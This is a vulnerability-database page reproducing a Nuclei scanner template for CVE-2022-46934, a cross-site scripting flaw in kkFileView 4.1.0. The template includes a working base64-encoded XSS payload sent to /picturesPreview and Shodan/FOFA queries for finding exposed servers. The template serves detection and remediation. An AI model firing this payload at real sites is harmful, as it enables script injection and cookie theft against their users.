Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2022-46934
HistoryMar 31, 2023 - 11:28 a.m.

kkFileView 4.1.0 - Cross-Site Scripting

2023-03-3111:28:24
ProjectDiscovery
github.com
9
cve
cross-site scripting
kkfileview
keking
security vulnerability
authentication
exploit mitigation

6.1 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

0.012 Low

EPSS

Percentile

85.3%

kkFileView 4.1.0 is susceptible to cross-site scripting via the url parameter at /controller/OnlinePreviewController.java. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
id: CVE-2022-46934

info:
  name: kkFileView 4.1.0 - Cross-Site Scripting
  author: r3Y3r53
  severity: medium
  description: |
    kkFileView 4.1.0 is susceptible to cross-site scripting via the url parameter at /controller/OnlinePreviewController.java. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.
  remediation: |
    Upgrade to a patched version of kkFileView or apply the necessary security patches provided by the vendor.
  reference:
    - https://github.com/kekingcn/kkFileView/issues/411
    - https://nvd.nist.gov/vuln/detail/CVE-2022-46934
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2022-46934
    cwe-id: CWE-79
    epss-score: 0.01051
    epss-percentile: 0.84009
    cpe: cpe:2.3:a:keking:kkfileview:4.1.0:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: keking
    product: kkfileview
    shodan-query:
      - http.html:"kkFileView"
      - http.html:"kkfileview"
    fofa-query:
      - body="kkfileview"
      - app="kkfileview"
  tags: cve,cve2022,xss,kkfileview,keking

http:
  - method: GET
    path:
      - "{{BaseURL}}/picturesPreview?currentUrl=aHR0cDovLyIpO2FsZXJ0KGRvY3VtZW50LmRvbWFpbik7Ly8=&urls"

    matchers-condition: and
    matchers:
      - type: word
        words:
          - document.getElementById("http://");alert(document.domain);//").click();
          - viewer.min.css
        condition: and

      - type: status
        status:
          - 200
# digest: 4a0a004730450221009714759f9c55ff762d4170cebfc285ef71775e8e264e47c6fe4db3cfd471434702203ee16fefce1a7e50630a4bbda4c992381a98161b415bda5157f86cd6357d5175:922c64590222798bb761d5b6d8e72950

6.1 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

0.012 Low

EPSS

Percentile

85.3%

Related for NUCLEI:CVE-2022-46934